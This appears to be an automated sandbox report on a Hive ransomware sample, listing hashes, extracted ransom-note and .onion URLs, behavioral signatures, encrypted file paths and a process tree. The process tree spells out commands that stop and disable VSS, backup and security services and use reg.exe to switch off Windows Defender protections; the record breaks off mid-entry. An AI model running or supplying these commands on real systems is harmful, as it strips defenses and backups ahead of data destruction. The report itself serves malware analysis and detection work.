Overview (score 10)
Static: score 8

Targets
- 211xahcou.exe (windows7-x64): score 10
- 211xahcou.exe (windows10-2004-x64): score 10
- hive.exe (windows7-x64): score 10
- hive.exe (windows10-2004-x64): score 10
- sjl8j6ap3.exe (windows7-x64): score 1
- sjl8j6ap3.exe (windows10-2004-x64): score 1
- windows_25...c5.exe (windows7-x64): score 10
- windows_25...c5.exe (windows10-2004-x64): score 10
- zi1ysv64h.exe (windows7-x64): score 10
- zi1ysv64h.exe (windows10-2004-x64): score 10

Resubmissions
- 23/12/2022, 20:19  221223-y39gvahb28  score 10
- 23/12/2022, 19:54  221223-ymz88scc8w  score 10
- 23/12/2022, 19:42  221223-yerbcsha78  score 10

Analysis
- max time kernel: 135s
- max time network: 93s
- platform: windows10-2004_x64
- resource: win10v2004-20220812-en
- resource tags: arch:x64 arch:x86 image:win10v2004-20220812-en locale:en-us os:windows10-2004-x64 system
- submitted: 23/12/2022, 19:42
Behavioral tasks
- behavioral1: 211xahcou.exe (resource win7-20220812-en)
- behavioral2: 211xahcou.exe (resource win10v2004-20220901-en)
- behavioral3: hive.exe (resource win7-20221111-en)
- behavioral4: hive.exe (resource win10v2004-20220812-en)
- behavioral5: sjl8j6ap3.exe (resource win7-20220812-en)
- behavioral6: sjl8j6ap3.exe (resource win10v2004-20221111-en)
- behavioral7: windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe (resource win7-20221111-en)
- behavioral8: windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe (resource win10v2004-20220812-en)
- behavioral9: zi1ysv64h.exe (resource win7-20221111-en)
General
- Target: windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
- Size: 884KB
- MD5: da13022097518d123a91a3958be326da
- SHA1: 24a71ab462594d5a159bbf176588af951aba1381
- SHA256: 25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5
- SHA512: a82aa97a92cd21ee2d4b556448fd3293396eb7c01d3626ebdb6c3816277783578686830c430014b6b2fc3280bc1301df27da079937f88834c2d35641eb5fc26f
- SSDEEP: 12288:Sw41dVZvThPCsM18GLHe7wlDdkPAQEtxr0fflvRmhEBWtdUJiAUtP/T/kAfMvgVt:dod1HDmlDdkZ4YXPpaTTXMw
Malware Config
Extracted
- Path: C:\EGdu_HOW_TO_DECRYPT.txt
- Family: hive
- URLs:
  http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/
  http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/
Signatures

Hive
A ransomware written in Golang first seen in June 2021.

description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | reg.exe
Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | reg.exe
Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection | reg.exe
Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | reg.exe
Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection | reg.exe
Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection | reg.exe
Modifies security service (2 TTPs, 1 IoC)
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" | reg.exe

Clears Windows event logs (1 TTP, 3 IoCs)
pid | Process
1340 | wevtutil.exe
4544 | wevtutil.exe
2072 | wevtutil.exe

Deletes shadow copies (2 TTPs)
Ransomware often targets backup files to inhibit system recovery.
Modifies extensions of user files (8 IoCs)
Ransomware generally changes the extension on encrypted files.
description | ioc
Process (all rows): windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification | C:\Users\Admin\Pictures\PublishConnect.png.cUlvoIO5vsp2OVHe3BdEExjxOc4tqw316WcYgkhFn_9qmWX0n8HLDerZamfaRdtf.uj1ps
File renamed | C:\Users\Admin\Pictures\RedoComplete.crw => C:\Users\Admin\Pictures\RedoComplete.crw.cUlvoIO5vsp2OVHe3BdEExjxOc4tqw316WcYgkhFn_9AY37H5KFDNrXxUhOtPy0K.uj1ps
File opened for modification | C:\Users\Admin\Pictures\RedoComplete.crw.cUlvoIO5vsp2OVHe3BdEExjxOc4tqw316WcYgkhFn_9AY37H5KFDNrXxUhOtPy0K.uj1ps
File renamed | C:\Users\Admin\Pictures\ResolveResize.tiff => C:\Users\Admin\Pictures\ResolveResize.tiff.cUlvoIO5vsp2OVHe3BdEExjxOc4tqw316WcYgkhFn__Us4YzOhXZMUNOQzc3tfEs.uj1ps
File opened for modification | C:\Users\Admin\Pictures\ResolveResize.tiff.cUlvoIO5vsp2OVHe3BdEExjxOc4tqw316WcYgkhFn__Us4YzOhXZMUNOQzc3tfEs.uj1ps
File renamed | C:\Users\Admin\Pictures\StopBlock.tif => C:\Users\Admin\Pictures\StopBlock.tif.cUlvoIO5vsp2OVHe3BdEExjxOc4tqw316WcYgkhFn_9GiVhrZyA8GuRQqlmuPQ0R.uj1ps
File opened for modification | C:\Users\Admin\Pictures\StopBlock.tif.cUlvoIO5vsp2OVHe3BdEExjxOc4tqw316WcYgkhFn_9GiVhrZyA8GuRQqlmuPQ0R.uj1ps
File renamed | C:\Users\Admin\Pictures\PublishConnect.png => C:\Users\Admin\Pictures\PublishConnect.png.cUlvoIO5vsp2OVHe3BdEExjxOc4tqw316WcYgkhFn_9qmWX0n8HLDerZamfaRdtf.uj1ps

resource | yara_rule
behavioral8/memory/4104-132-0x0000000000E50000-0x0000000001162000-memory.dmp | upx
behavioral8/memory/4104-133-0x0000000000E50000-0x0000000001162000-memory.dmp | upx
Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.

Drops file in Program Files directory (64 IoCs)
description | ioc
Process (all rows): windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\HomeStudent2019R_Retail-ul-phn.xrm-ms.cUlvoIO5vsp2OVHe3BdEExjxOc4tqw316WcYgkhFn_92n9zK5S4GLHCVwx0vVXxz.uj1ps
File opened for modification | C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\ReactAssets\assets\RNApp\app\uwp\images\stickers\word_art\sticker20.png
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\ca-es\ui-strings.js.cUlvoIO5vsp2OVHe3BdEExjxOc4tqw316WcYgkhFn_8rS9OzWqO1JIJ5IPrEZiNX.uj1ps
File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1907.3152.0_x64__8wekyb3d8bbwe\Assets\InsiderHubAppList.targetsize-72.png
File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxMailAppList.targetsize-16.png
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.nl_ja_4.4.0.v20140623020002.jar.cUlvoIO5vsp2OVHe3BdEExjxOc4tqw316WcYgkhFn_9WQaBFDnBYDFa4DxQotWYT.uj1ps
File opened for modification | C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AppTiles\Weather_BadgeLogo.scale-100.png
File opened for modification | C:\Program Files\WindowsApps\Microsoft.Getstarted_8.2.22942.0_x64__8wekyb3d8bbwe\Assets\GetStartedAppList.targetsize-60_altform-unplated.png
File opened for modification | C:\Program Files\WindowsApps\Microsoft.NET.Native.Runtime.1.7_1.7.25531.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\Autogen\JSByteCodeCache_64
File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Home\LTR\contrast-black\LargeTile.scale-100.png
File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxCalendarAppList.targetsize-30_altform-unplated.png
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\br.gif.cUlvoIO5vsp2OVHe3BdEExjxOc4tqw316WcYgkhFn_8MabDJ61ODNVbuPAubGTIG.uj1ps
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\base_uris.js.cUlvoIO5vsp2OVHe3BdEExjxOc4tqw316WcYgkhFn__GRtovGjBcOTAFf8XdHG8R.uj1ps
File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\VisioStd2019R_Grace-ul-oob.xrm-ms.cUlvoIO5vsp2OVHe3BdEExjxOc4tqw316WcYgkhFn_-PMKGKCumCNue-XesMV-Qs.uj1ps
File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\WordR_Trial-pl.xrm-ms.cUlvoIO5vsp2OVHe3BdEExjxOc4tqw316WcYgkhFn_9E-Qoi8KGEb5hxTbIU-FkO.uj1ps
File opened for modification | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsStore_11910.1002.5.0_neutral_split.scale-100_8wekyb3d8bbwe\AppxManifest.xml
File created | C:\Program Files\Microsoft Office\root\Office16\MSIPC\ko\EGdu_HOW_TO_DECRYPT.txt
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\themes\dark\cstm_brand_preview2x.png.cUlvoIO5vsp2OVHe3BdEExjxOc4tqw316WcYgkhFn_-8hKnijPosP6BxdDDUkAcu.uj1ps
File opened for modification | C:\Program Files (x86)\Common Files\System\Ole DB\sqlxmlx.rll
File created | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\ModuleAutoDeps\EGdu_HOW_TO_DECRYPT.txt
File opened for modification | C:\Program Files\WindowsApps\Microsoft.WebMediaExtensions_1.0.20875.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppList.targetsize-20_contrast-black.png
File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\en-us\mso.acl
File opened for modification | C:\Program Files\Java\jre1.8.0_66\bin\server\classes.jsa
File opened for modification | C:\Program Files\Windows Media Player\Network Sharing\wmpnss_color32.bmp
File opened for modification | C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\OneNoteAppList.targetsize-256.png
File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1906.2182.0_x64__8wekyb3d8bbwe\Assets\AlarmsAppList.targetsize-24_altform-unplated.png
File opened for modification | C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\contrast-black\Logo.scale-100_contrast-black.png
File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxCalendarWideTile.scale-200.png
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\EGdu_HOW_TO_DECRYPT.txt
File opened for modification | C:\Program Files\Mozilla Firefox\browser\features\screenshots@mozilla.org.xpi.cUlvoIO5vsp2OVHe3BdEExjxOc4tqw316WcYgkhFn_828nlqvF9sLbIDMMEMugFo.uj1ps
File opened for modification | C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-black\OneNoteAppList.scale-100.png
File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1906.2182.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\WorldClockSmallTile.contrast-white_scale-100.png
File opened for modification | C:\Program Files\WindowsApps\Microsoft.XboxApp_48.49.31001.0_x64__8wekyb3d8bbwe\Assets\GamesXboxHubAppList.targetsize-16_altform-unplated.png
File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\ExchangeWideTile.scale-200.png
File opened for modification | C:\Program Files\Common Files\System\Ole DB\de-DE\sqlxmlx.rll.mui
File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\ipshe.xml
File opened for modification | C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNotePageWideTile.scale-100.png
File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\en-US\InkObj.dll.mui
File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\AccessR_Trial-ppd.xrm-ms.cUlvoIO5vsp2OVHe3BdEExjxOc4tqw316WcYgkhFn_8Teed9lklGUMg97OTOdcx8.uj1ps
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\tool\plugin.js.cUlvoIO5vsp2OVHe3BdEExjxOc4tqw316WcYgkhFn__BdOBAN6aPenoJvrLi9H8b.uj1ps
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\en-il\EGdu_HOW_TO_DECRYPT.txt
File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_OEM_Perp4-ul-oob.xrm-ms.cUlvoIO5vsp2OVHe3BdEExjxOc4tqw316WcYgkhFn_9uVvdsQ1lzC2A0WIEUho1h.uj1ps
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\CompleteCheckmark2x.png.cUlvoIO5vsp2OVHe3BdEExjxOc4tqw316WcYgkhFn_93GIMvWFVoXS_-5yqaznoC.uj1ps
File created | C:\Program Files\Microsoft Office\root\Office16\MSIPC\et\EGdu_HOW_TO_DECRYPT.txt
File opened for modification | C:\Program Files\WindowsApps\Microsoft.UI.Xaml.2.0_2.1810.18004.0_x64__8wekyb3d8bbwe\Microsoft.UI.Xaml.winmd
File created | C:\Program Files\Java\jre1.8.0_66\lib\fonts\EGdu_HOW_TO_DECRYPT.txt
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-sampler_zh_CN.jar.cUlvoIO5vsp2OVHe3BdEExjxOc4tqw316WcYgkhFn__96qEkjXeEJB2hXoSPCntA.uj1ps
File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\VBA\VBA7.1\1033\VBCN6.CHM.cUlvoIO5vsp2OVHe3BdEExjxOc4tqw316WcYgkhFn__L7hQ04TdcKvLN3UTfgU8J.uj1ps
File opened for modification | C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\OneNotePageMedTile.scale-150.png
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\uk-ua\ui-strings.js.cUlvoIO5vsp2OVHe3BdEExjxOc4tqw316WcYgkhFn_-DMMew7es-dfx-60RvYvc8.uj1ps
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\zh-tw\ui-strings.js.cUlvoIO5vsp2OVHe3BdEExjxOc4tqw316WcYgkhFn_9ggHsWagIuSHjFz4bTyFlV.uj1ps
File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\en-US\mip.exe.mui
File opened for modification | C:\Program Files\WindowsApps\Microsoft.WebMediaExtensions_1.0.20875.0_x64__8wekyb3d8bbwe\Assets\AppList.targetsize-80.png
File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\GenericMailMediumTile.scale-100.png
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\config\Modules\org-netbeans-core-execution.xml_hidden.cUlvoIO5vsp2OVHe3BdEExjxOc4tqw316WcYgkhFn_8cWE6A2Ek3TzIm-kDYWYt4.uj1ps
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\ui-strings.js.cUlvoIO5vsp2OVHe3BdEExjxOc4tqw316WcYgkhFn_9eE4FLraEVdYj4P3rRSkou.uj1ps
File opened for modification | C:\Program Files (x86)\Common Files\Microsoft Shared\ink\de-DE\InkObj.dll.mui.cUlvoIO5vsp2OVHe3BdEExjxOc4tqw316WcYgkhFn_-afb6Cu60xehrHgsBpRmR1.uj1ps
File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1907.3152.0_x64__8wekyb3d8bbwe\Assets\InsiderHubAppList.targetsize-36.png
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\themes\dark\bg_patterns_header.png.cUlvoIO5vsp2OVHe3BdEExjxOc4tqw316WcYgkhFn__43a3w0cRLBw22SbYsFe91.uj1ps
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\en-gb\ui-strings.js.cUlvoIO5vsp2OVHe3BdEExjxOc4tqw316WcYgkhFn_9wWpGYSYxRNVoxJSs-wuUE.uj1ps
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\fi-fi\EGdu_HOW_TO_DECRYPT.txt
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-api-visual_zh_CN.jar.cUlvoIO5vsp2OVHe3BdEExjxOc4tqw316WcYgkhFn_-oG2fPpe6qLF6M5R8vV-YB.uj1ps
File opened for modification | C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_2019.125.2243.0_neutral_~_8wekyb3d8bbwe\AppxSignature.p7x
File opened for modification | C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\resources\strings\LocalizedStrings_zh-TW.json
Launches sc.exe (8 IoCs)
Sc.exe is a Windows utility to control services on the system.
pid | Process
1432 | sc.exe
2468 | sc.exe
4288 | sc.exe
3420 | sc.exe
2760 | sc.exe
4364 | sc.exe
2172 | sc.exe
4972 | sc.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses (6 IoCs)
pid | Process
4076 | powershell.exe
4076 | powershell.exe
4860 | powershell.exe
4860 | powershell.exe
4104 | windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
4104 | windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
Suspicious use of AdjustPrivilegeToken (64 IoCs)
description | pid | Process
Token: SeSecurityPrivilege | 1340 | wevtutil.exe
Token: SeBackupPrivilege | 1340 | wevtutil.exe
Token: SeSecurityPrivilege | 4544 | wevtutil.exe
Token: SeBackupPrivilege | 4544 | wevtutil.exe
Token: SeSecurityPrivilege | 2072 | wevtutil.exe
Token: SeBackupPrivilege | 2072 | wevtutil.exe
Tokens: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36 | 864 | wmic.exe
Tokens: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36 | 3828 | wmic.exe
Tokens: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege | 3828 | wmic.exe
Suspicious use of WriteProcessMemory (64 IoCs)
description | pid | Process | procid_target
Process for pid 4104 (all rows): windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
PID 4104 wrote to memory of 2804 | 4104 | windows_25bfec...exe | 87 (3 entries)
PID 2804 wrote to memory of 4292 | 2804 | net.exe | 89 (3 entries)
PID 4104 wrote to memory of 4380 | 4104 | windows_25bfec...exe | 90 (3 entries)
PID 4380 wrote to memory of 4680 | 4380 | net.exe | 92 (3 entries)
PID 4104 wrote to memory of 1544 | 4104 | windows_25bfec...exe | 93 (3 entries)
PID 1544 wrote to memory of 3444 | 1544 | net.exe | 95 (3 entries)
PID 4104 wrote to memory of 3084 | 4104 | windows_25bfec...exe | 96 (3 entries)
PID 3084 wrote to memory of 1040 | 3084 | net.exe | 98 (3 entries)
PID 4104 wrote to memory of 1888 | 4104 | windows_25bfec...exe | 99 (3 entries)
PID 1888 wrote to memory of 3108 | 1888 | net.exe | 101 (3 entries)
PID 4104 wrote to memory of 4552 | 4104 | windows_25bfec...exe | 102 (3 entries)
PID 4552 wrote to memory of 3840 | 4552 | net.exe | 104 (3 entries)
PID 4104 wrote to memory of 4600 | 4104 | windows_25bfec...exe | 105 (3 entries)
PID 4600 wrote to memory of 2664 | 4600 | net.exe | 107 (3 entries)
PID 4104 wrote to memory of 1720 | 4104 | windows_25bfec...exe | 108 (3 entries)
PID 1720 wrote to memory of 2592 | 1720 | net.exe | 110 (3 entries)
PID 4104 wrote to memory of 2468 | 4104 | windows_25bfec...exe | 111 (3 entries)
PID 4104 wrote to memory of 4288 | 4104 | windows_25bfec...exe | 113 (3 entries)
PID 4104 wrote to memory of 3420 | 4104 | windows_25bfec...exe | 115 (3 entries)
PID 4104 wrote to memory of 2760 | 4104 | windows_25bfec...exe | 117 (3 entries)
PID 4104 wrote to memory of 4364 | 4104 | windows_25bfec...exe | 119 (3 entries)
PID 4104 wrote to memory of 2172 | 4104 | windows_25bfec...exe | 122 (1 entry)
Processes
(process tree: image path, then command line, behaviour tags and PID; children are indented under their parent)

C:\Users\Admin\AppData\Local\Temp\windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
  "C:\Users\Admin\AppData\Local\Temp\windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe"
  - Modifies extensions of user files
  - Drops file in Program Files directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:4104

    C:\Windows\SysWOW64\net.exe
      net.exe stop "SamSs" /y
      - Suspicious use of WriteProcessMemory
      PID:2804
        C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 stop "SamSs" /y
          PID:4292

    C:\Windows\SysWOW64\net.exe
      net.exe stop "SDRSVC" /y
      - Suspicious use of WriteProcessMemory
      PID:4380
        C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 stop "SDRSVC" /y
          PID:4680

    C:\Windows\SysWOW64\net.exe
      net.exe stop "SstpSvc" /y
      - Suspicious use of WriteProcessMemory
      PID:1544
        C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 stop "SstpSvc" /y
          PID:3444

    C:\Windows\SysWOW64\net.exe
      net.exe stop "vmicvss" /y
      - Suspicious use of WriteProcessMemory
      PID:3084
        C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 stop "vmicvss" /y
          PID:1040

    C:\Windows\SysWOW64\net.exe
      net.exe stop "VSS" /y
      - Suspicious use of WriteProcessMemory
      PID:1888
        C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 stop "VSS" /y
          PID:3108

    C:\Windows\SysWOW64\net.exe
      net.exe stop "wbengine" /y
      - Suspicious use of WriteProcessMemory
      PID:4552
        C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 stop "wbengine" /y
          PID:3840

    C:\Windows\SysWOW64\net.exe
      net.exe stop "WebClient" /y
      - Suspicious use of WriteProcessMemory
      PID:4600
        C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 stop "WebClient" /y
          PID:2664

    C:\Windows\SysWOW64\net.exe
      net.exe stop "UnistoreSvc_1a9ad" /y
      - Suspicious use of WriteProcessMemory
      PID:1720
        C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 stop "UnistoreSvc_1a9ad" /y
          PID:2592

    C:\Windows\SysWOW64\sc.exe
      sc.exe config "SamSs" start= disabled
      - Launches sc.exe
      PID:2468

    C:\Windows\SysWOW64\sc.exe
      sc.exe config "SDRSVC" start= disabled
      - Launches sc.exe
      PID:4288

    C:\Windows\SysWOW64\sc.exe
      sc.exe config "SstpSvc" start= disabled
      - Launches sc.exe
      PID:3420

    C:\Windows\SysWOW64\sc.exe
      sc.exe config "vmicvss" start= disabled
      - Launches sc.exe
      PID:2760

    C:\Windows\SysWOW64\sc.exe
      sc.exe config "VSS" start= disabled
      - Launches sc.exe
      PID:4364

    C:\Windows\SysWOW64\sc.exe
      sc.exe config "wbengine" start= disabled
      - Launches sc.exe
      PID:2172

    C:\Windows\SysWOW64\sc.exe
      sc.exe config "WebClient" start= disabled
      - Launches sc.exe
      PID:4972

    C:\Windows\SysWOW64\sc.exe
      sc.exe config "UnistoreSvc_1a9ad" start= disabled
      - Launches sc.exe
      PID:1432

    C:\Windows\SysWOW64\reg.exe
      reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
      PID:1192

    C:\Windows\SysWOW64\reg.exe
      reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
      PID:5028

    C:\Windows\SysWOW64\reg.exe
      reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
      PID:4744

    C:\Windows\SysWOW64\reg.exe
      reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
      PID:1788

    C:\Windows\SysWOW64\reg.exe
      reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
      PID:2220

    C:\Windows\SysWOW64\reg.exe
      reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
      - Modifies Windows Defender Real-time Protection settings
      PID:4676

    C:\Windows\SysWOW64\reg.exe
      reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
      - Modifies Windows Defender Real-time Protection settings
      PID:5016

    C:\Windows\SysWOW64\reg.exe
      reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
      - Modifies Windows Defender Real-time Protection settings
      PID:1336

    C:\Windows\SysWOW64\reg.exe
      reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
      - Modifies Windows Defender Real-time Protection settings
      PID:3412

    C:\Windows\SysWOW64\reg.exe
      reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
      - Modifies Windows Defender Real-time Protection settings
      PID:4568

    C:\Windows\SysWOW64\reg.exe
